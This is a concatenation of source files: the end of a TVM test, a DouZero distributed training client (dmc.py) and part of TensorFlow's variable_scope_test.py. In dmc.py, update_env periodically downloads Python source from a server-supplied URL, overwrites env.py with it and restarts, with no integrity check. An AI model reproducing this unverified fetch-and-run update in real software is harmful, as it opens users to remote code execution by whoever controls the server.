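# lowering of tf.nn.moments plus the normalization: mean over axis 1, subtract,
# the squared difference expressed as a multiply, a second mean for the variance,
# the 0.0005 epsilon add, sqrt, then divide. The unused placeholder %B is pruned
# and does not appear in the Relay main function.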
if __name__ == "__main__":
pytest.main([__file__])
|
dmc.py
|
import os
import sys
import threading
import time
import timeit
import pprint
from collections import deque
import warnings
import torch
from torch import multiprocessing as mp
from torch import nn
import pickle
import random
from .file_writer import FileWriter
from .models import Model
from .utils import get_batch, log, create_env, create_optimizers, act
import client_helper
import bit_helper
import requests
from douzero.env.env import env_version
mean_episode_return_buf = {p: deque(maxlen=100) for p in ['landlord', 'landlord_up', 'landlord_down']}
model_version = 0
models = {}
warnings.filterwarnings("ignore", category=UserWarning)
def compute_loss(logits, targets):
loss = ((logits.squeeze(-1) - targets) ** 2).mean()
return loss
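# Worked example (illustrative only, not executed anywhere in training):
# with logits of shape (N, 1) and targets of shape (N,), compute_loss is a plain
# mean-squared error, e.g.
#   compute_loss(torch.tensor([[1.0], [2.0]]), torch.tensor([1.0, 0.0]))
#   == ((1 - 1) ** 2 + (2 - 0) ** 2) / 2 == 2.0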
batches = []
program_version = "3.0.0"
updating = False
def learn(position, actor_models, model, batch, optimizer, flags, lock):
global model_version, models, batches
batches.append({
"position": position,
"batch": batch
})
return {
'mean_episode_return_' + position: 0,
'loss_' + position: 0,
}
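# Note: in this distributed client, learn() performs no local optimization. It only
# queues the collected batch; upload_batch_loop() inside train() later ships the
# queued batches to the server via client_helper.handle_batches and pulls back any
# updated model weights. The zeroed stats returned here exist only to keep the
# logging path in batch_and_learn() unchanged.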
def train(flags):
"""
    This is the main function for training. It will first
    initialize everything, such as buffers, optimizers, etc.
    Then it will start subprocesses as actors. Finally, it will call
    the learning function with multiple threads.
"""
global models
plogger = FileWriter(
xpid=flags.xpid,
xp_args=flags.__dict__,
rootdir=flags.savedir,
)
checkpointpath = os.path.expandvars(
os.path.expanduser('%s/%s/%s' % (flags.savedir, flags.xpid, 'model.tar')))
T = flags.unroll_length
B = flags.batch_size
print(flags.actor_device_cpu)
if flags.actor_device_cpu:
device_iterator = ['cpu']
else:
device_iterator = range(flags.num_actor_devices)
assert flags.num_actor_devices <= len(flags.gpu_devices.split(',')), 'The number of actor devices can not exceed the number of available devices'
def update_model(ver, urls, force):
global model_version, models, updating
if updating:
return
updating = True
if model_version != ver or force:
print("检测到模型更新")
if len(urls) > 0:
url = urls[random.randint(0, len(urls)-1)]
else:
print("模型更新失败:没有有效的模型地址")
updating = False
return
print("更新中,请耐心等待")
st = time.time()
weights = client_helper.download_pkl(url)
if weights is not None:
model_version = ver
for position in ["landlord", "landlord_up", "landlord_down", "bidding"]:
if flags.actor_device_cpu:
models["cpu"].get_model(position).load_state_dict(weights[position])
torch.save(weights[position], "./models/" + position + ".ckpt")
else:
for device in range(flags.num_actor_devices):
models[device].get_model(position).load_state_dict(weights[position])
torch.save(weights[position], "./models/" + position + ".ckpt")
with open("./model_version.txt", "w") as f:
f.write(str(model_version))
print("更新模型成功!耗时: %.1f s" % (time.time() - st))
else:
print("更新模型失败!")
updating = False
def load_actor_models():
global model_version, models
if os.path.exists("./model_version.txt"):
with open("./model_version.txt", "r") as f:
model_version = int(f.read())
print("初始化,正在获取服务器版本")
model_info = client_helper.get_model_info()
if model_info is not None:
print("版本获取完成,服务器版本:", model_info["version"])
update_model(model_info["version"], model_info["urls"], False)
else:
print("服务器版本获取失败,更新模型失败")
return
if not (os.path.exists("./models/landlord.ckpt") and os.path.exists(
"./models/landlord_up.ckpt") and os.path.exists("./models/landlord_down.ckpt") and os.path.exists("./models/bidding.ckpt")):
update_model(model_info["version"], model_info["urls"], True)
# def check_update_model(force=False):
# global model_version, models
# if os.path.exists("./model_version.txt"):
# with open("./model_version.txt", "r") as f:
# model_version = int(f.read())
# print("版本比对中")
# model_info = client_helper.get_model_info()
# if model_info is not None:
# if model_info["program_version"] != program_version:
# print("客户端版本不正确!请从Github重新拉取!")
# return
# print("服务器版本:", model_info["version"])
# update_model(model_info["version"], model_info["urls"], force)
# else:
# print("版本比对失败,更新模型失败")
# if not (os.path.exists("./models/landlord.ckpt") and os.path.exists(
# "./models/landlord_up.ckpt") and os.path.exists("./models/landlord_down.ckpt")):
# update_model(model_info["version"], model_info["urls"], True)
# Initialize actor models
global models
models = {}
for device in device_iterator:
model = Model(device="cpu")
model.eval()
models[device] = model
# Initialize queues
actor_processes = []
ctx = mp.get_context('spawn')
batch_queues = {"landlord": ctx.SimpleQueue(), "landlord_up": ctx.SimpleQueue(), "landlord_down": ctx.SimpleQueue(), "bidding": ctx.SimpleQueue()}
# Learner model for training
learner_model = Model(device=flags.training_device)
# Create optimizers
optimizers = create_optimizers(flags, learner_model)
# Stat Keys
stat_keys = [
'mean_episode_return_landlord',
'loss_landlord',
'mean_episode_return_landlord_up',
'loss_landlord_up',
'mean_episode_return_landlord_down',
'loss_landlord_down',
'mean_episode_return_bidding',
'loss_bidding',
]
frames, stats = 0, {k: 0 for k in stat_keys}
position_frames = {'landlord': 0, 'landlord_up': 0, 'landlord_down': 0, 'bidding': 0}
global model_version
# Load models if any
if flags.load_model:
print("加载模型中,请稍后")
load_actor_models()
for position in ["landlord", "landlord_up", "landlord_down", 'bidding']:
if flags.actor_device_cpu:
models["cpu"].get_model(position).load_state_dict(torch.load("./models/" + position + ".ckpt", map_location="cpu"))
else:
for device in device_iterator:
models[device].get_model(position).load_state_dict(torch.load("./models/" + position + ".ckpt", map_location="cuda:"+str(device)))
# Starting actor processes
if flags.actor_device_cpu:
flags.num_actor_devices = 1
for device in device_iterator:
num_actors = flags.num_actors
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(i, device, batch_queues, models[device], flags))
actor.start()
actor_processes.append(actor)
def upload_batch_loop(flags):
global model_version, models
while True:
if len(batches) > 0:
my_batches = []
my_batches.extend(batches)
batches.clear()
ver, urls = client_helper.handle_batches(my_batches, model_version, program_version)
st = time.time()
if len(urls) > 0:
if ver != model_version:
print("新模型:", ver)
update_model(ver, urls, True)
print("更新完成!耗时: %.1f s" % (time.time() - st))
else:
print("没有收到模型下载地址")
else:
print("没有新Batch")
time.sleep(15)
def update_env(env_ver, url, force=False):
if env_ver != env_version or force:
try:
req = requests.get(url)
data = req.content
if len(data) > 10000:
with open("douzero/env/env.py", "wb") as f:
f.write(data)
print("更新Env文件,重启客户端")
os.execl(sys.executable, sys.executable, *sys.argv)
time.sleep(1)
exit()
else:
print("更新Env文件时出错: ", data)
except Exception as e:
print("更新Env文件时出错: ", repr(e))
def check_model_update_loop():
while True:
try:
info = client_helper.get_model_info()
if info is not None:
if "program_version" in info:
if info["program_version"] != program_version:
print("客户端版本过时,请从Github重新拉取")
# ver, urls = info["version"], info["urls"]
# update_model(ver, urls, False)
env_ver = info["env_version"]
update_env(env_ver, info["env_url"])
except Exception as e:
print("在检查模型更新时出现错误: ", repr(e))
time.sleep(300)
def batch_and_learn(i, device, position, local_lock, position_lock, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal frames, position_frames, stats
while frames < flags.total_frames:
batch = get_batch(batch_queues, position, flags, local_lock)
_stats = learn(position, models, learner_model.get_model(position), batch,
optimizers[position], flags, position_lock)
with lock:
for k in _stats:
stats[k] = _stats[k]
to_log = dict(frames=frames)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
frames += T * B
position_frames[position] += T * B
thread_upload = threading.Thread(target=upload_batch_loop, args=(flags,))
    thread_upload.daemon = True
thread_upload.start()
thread_update_model = threading.Thread(target=check_model_update_loop)
    thread_update_model.daemon = True
thread_update_model.start()
threads = []
locks = {}
for device in device_iterator:
locks[device] = {'landlord': threading.Lock(), 'landlord_up': threading.Lock(), 'landlord_down': threading.Lock(), 'bidding': threading.Lock()}
position_locks = {'landlord': threading.Lock(), 'landlord_up': threading.Lock(), 'landlord_down': threading.Lock(), 'bidding': threading.Lock()}
for device in device_iterator:
for i in range(flags.num_threads):
for position in ['landlord', 'landlord_up', 'landlord_down', 'bidding']:
thread = threading.Thread(
target=batch_and_learn, name='batch-and-learn-%d' % i, args=(i,device,position,locks[device][position],position_locks[position]))
thread.start()
threads.append(thread)
def checkpoint(frames):
if flags.disable_checkpoint:
return
# log.info('Saving checkpoint to %s', checkpointpath)
# _models = learner_model.get_models()
# torch.save({
# 'model_state_dict': {k: _models[k].state_dict() for k in _models},
# 'optimizer_state_dict': {k: optimizers[k].state_dict() for k in optimizers},
# "stats": stats,
# 'flags': vars(flags),
# 'frames': frames,
# 'position_frames': position_frames
# }, checkpointpath)
# Save the weights for evaluation purpose
# for position in ['landlord', 'landlord_up', 'landlord_down']:
# model_weights_dir = os.path.expandvars(os.path.expanduser(
# '%s/%s/%s' % (flags.savedir, flags.xpid, position + '_weights_' + str(frames) + '.ckpt')))
# torch.save(learner_model.get_model(position).state_dict(), model_weights_dir)
fps_log = []
timer = timeit.default_timer
try:
last_checkpoint_time = timer() - flags.save_interval * 60
while frames < flags.total_frames:
start_frames = frames
position_start_frames = {k: position_frames[k] for k in position_frames}
start_time = timer()
time.sleep(10)
if timer() - last_checkpoint_time > flags.save_interval * 60:
checkpoint(frames)
last_checkpoint_time = timer()
end_time = timer()
fps = (frames - start_frames) / (end_time - start_time)
fps_avg = 0
fps_log.append(fps)
if len(fps_log) > 30:
fps_log = fps_log[1:]
for fps_record in fps_log:
fps_avg += fps_record
fps_avg = fps_avg / len(fps_log)
position_fps = {k: (position_frames[k] - position_start_frames[k]) / (end_time - start_time) for k in
position_frames}
log.info("本机速度 %.1f fps", fps_avg)
if fps_avg == 0:
print("本机速度在训练的前几分钟为0是正常现象,请稍后")
# log.info('After %i (L:%i U:%i D:%i) frames: @ %.1f fps (avg@ %.1f fps) (L:%.1f U:%.1f D:%.1f) Stats:\n%s',
# frames,
# position_frames['landlord'],
# position_frames['landlord_up'],
# position_frames['landlord_down'],
# fps,
# fps_avg,
# position_fps['landlord'],
# position_fps['landlord_up'],
# position_fps['landlord_down'],
# pprint.pformat(stats))
except KeyboardInterrupt:
return
else:
for thread in threads:
thread.join()
log.info('Learning finished after %d frames.', frames)
checkpoint(frames)
plogger.close()
|
variable_scope_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
from tensorflow.python.util import tf_inspect
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
if context.executing_eagerly():
wrapped = wrap_function.wrap_function(graph_function, [self])
# use the wrapped graph function
wrapped()
else:
# use the original function
graph_function(self)
return wrap_and_execute
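# Minimal usage sketch (illustrative only; the real tests below stack this decorator
# under test_util.run_in_graph_and_eager_modes so the same body is exercised both as
# a plain graph and as a wrapped function under eager execution):
#
#   @test_util.run_in_graph_and_eager_modes
#   @run_inside_wrap_function_in_eager_mode
#   def testSomething(self):
#     v = variable_scope.get_variable("v", [1])
#     ...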
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestingError(self):
with variable_scope.variable_scope("aa"):
scope = variable_scope.variable_scope("bb")
scope.__enter__()
with variable_scope.variable_scope("cc"):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
scope.__exit__(None, None, None)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'string:0' shape=() dtype=string>
# has invalid type <class '...ResourceVariable'>, must be a string or Tensor.
# (Can not convert a ResourceVariable into a Tensor or Operation.)
@test_util.run_deprecated_v1
def testStringDefaultInitializer(self):
with self.cached_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(self.evaluate(v)), b"")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertEqual(v1, v3)
self.assertEqual(v2, v4)
f()
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_in_graph_and_eager_modes
def testEagerVariablesStoreAddsToCollections(self):
store = variable_scope.EagerVariableStore()
with store.as_default():
trainable = variable_scope.get_variable("v1", [], trainable=True)
not_trainable = variable_scope.get_variable("v2", [], trainable=False)
concat = variable_scope.get_variable(
"v3", [], collections=[ops.GraphKeys.CONCATENATED_VARIABLES])
self.assertEqual(
ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES),
[trainable, not_trainable])
self.assertEqual(
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES),
[trainable, concat])
self.assertEqual(
ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES), [concat])
def testEagerVariablesOutsideStoreNotAddedToCollections(self):
with context.eager_mode():
variable_scope.get_variable("v1", [], trainable=True)
variable_scope.get_variable("v2", [], trainable=False)
self.assertFalse(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
self.assertFalse(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError=: You must feed a value for placeholder tensor
# 'ReadVariableOp/resource' with dtype resource
@test_util.run_in_graph_and_eager_modes
def testInitFromNonInitializer(self):
    # Test various dtypes with a zeros initializer, as follows:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
    # Use a different variable name for each dtype.
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError: /job:moo/replica:0/task:0/device:CPU:0 unknown device.
@test_util.run_deprecated_v1
def testVarScopeCachingDevice(self):
with self.cached_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.name is meaningless when eager execution is enabled.
@test_util.run_in_graph_and_eager_modes
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
      # The next 3 variables are not regularized, to test disabling
      # regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
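      # With init 0.3, regularizer1 yields 0.3 + 0.1 = 0.4 (for v and u) and
      # regularizer2 yields 0.3 + 0.2 = 0.5 (for w).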
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is already there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Tensor-typed variable initializers must either be wrapped in an
# init_scope or callable...
@test_util.run_in_graph_and_eager_modes
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'v0:0' shape=(1,) dtype=float32> has
# invalid type <class '...ops.resource_variable_ops.ResourceVariable'>, must
# be a string or Tensor. (Can not convert a ResourceVariable into a Tensor or
# Operation.)
@test_util.run_deprecated_v1
def testControlDeps(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
self.evaluate(v1.initializer)
self.assertEqual(1, self.evaluate(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(add)
# If we initialize v0 we should be able to run 'add'.
self.evaluate(v0.initializer)
self.evaluate(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AssertionError: True is not false (last assertFalse)
@test_util.run_deprecated_v1
def testEnableResourceVariables(self):
old = variable_scope._DEFAULT_USE_RESOURCE
try:
variable_scope.enable_resource_variables()
self.assertTrue(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
variable_scope.disable_resource_variables()
self.assertFalse(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
finally:
variable_scope._DEFAULT_USE_RESOURCE = old
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument None has invalid type <type 'NoneType'>
@test_util.run_deprecated_v1
def testControlFlow(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
      # We should be able to initialize and run v1 and v2 without initializing
      # v0, even though they were created inside cond branches gated on v0.
self.evaluate(v1.initializer)
self.assertEqual([1], self.evaluate(v1))
self.evaluate(v2.initializer)
self.assertEqual([2], self.evaluate(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
self.evaluate(add)
# If we initialize v0 we should be able to run 'add'.
self.evaluate(v0.initializer)
self.evaluate(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'.
@test_util.run_in_graph_and_eager_modes
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
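      # Reusing the captured scope keeps its variable-scope name ("tower4"),
      # but the enclosing name scope still nests under "tower6".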
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
